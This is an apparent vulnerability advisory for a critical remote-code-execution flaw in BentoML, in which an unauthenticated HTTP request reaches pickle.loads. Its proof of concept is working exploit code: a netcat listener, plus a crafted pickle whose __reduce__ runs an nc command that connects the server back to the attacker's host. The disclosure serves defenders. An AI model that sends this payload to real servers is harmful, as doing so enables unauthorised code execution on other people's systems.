PT-2026-53389 · Pypi · Bentoml

Publicado

2026-06-29

·

Atualizado

2026-06-29

CVSS v3.1

9.8

Crítica

VetorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

A Remote Code Execution (RCE) vulnerability caused by insecure deserialization has been identified in the latest version(v1.4.2) of BentoML. It allows any unauthenticated user to execute arbitrary code on the server.

Details

It exists an unsafe code segment in serde.py:
Python
def deserialize value(self, payload: Payload) -> t.Any:
  if "buffer-lengths" not in payload.metadata:
    return pickle.loads(b"".join(payload.data))
Through data flow analysis, it is confirmed that the payload content is sourced from an HTTP request, which can be fully manipulated by the attack. Due to the lack of validation in the code, maliciously crafted serialized data can execute harmful actions during deserialization.

PoC

Environment:
  • Server host:
  • IP: 10.98.36.123
  • OS: Ubuntu
  • Attack host:
  • IP: 10.98.36.121
  • OS: Ubuntu
  1. Follow the instructions on the BentoML official README(https://github.com/bentoml/BentoML) to set up the environment.
1.1 Install BentoML (Server host: 10.98.36.123) : pip install -U bentoml
1.2 Define APIs in a service.py file (Server host: 10.98.36.123) :
Python
from  future  import annotations

import bentoml

@bentoml.service(
  resources={"cpu": "4"}
)
class Summarization:
  def  init (self) -> None:
    import torch
    from transformers import pipeline

    device = "cuda" if torch.cuda.is available() else "cpu"
    self.pipeline = pipeline('summarization', device=device)

  @bentoml.api(batchable=True)
  def summarize(self, texts: list[str]) -> list[str]:
    results = self.pipeline(texts)
    return [item['summary text'] for item in results]
1.3 Run the service code (Server host: 10.98.36.123) :
Bash
pip install torch transformers # additional dependencies for local run

bentoml serve
  1. Start nc listening on the attacking host (Attack host: 10.98.36.121) : nc -lvvp 1234
  2. Send maliciously crafted request (Attack host: 10.98.36.121) :
Python
 import pickle
import os
import requests

headers = {'Content-Type': 'application/vnd.bentoml+pickle'}
 
class Evil:
  def  reduce (self):
    return(os.system, ('nc 10.98.36.121 1234',))

payload = pickle.dumps(Evil())

requests.post("http://10.98.36.123:3000/summarize", data=payload, headers=headers)
  1. Attack success (Attack host: 10.98.36.121) : The server host(10.98.36.123) has connected to the attacker's host(10.98.36.121) listening on port 1234. nc

Impact

Remote Code Execution (RCE).

Correção

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

Identificadores relacionados

PYSEC-2026-294

Produtos afetados

Bentoml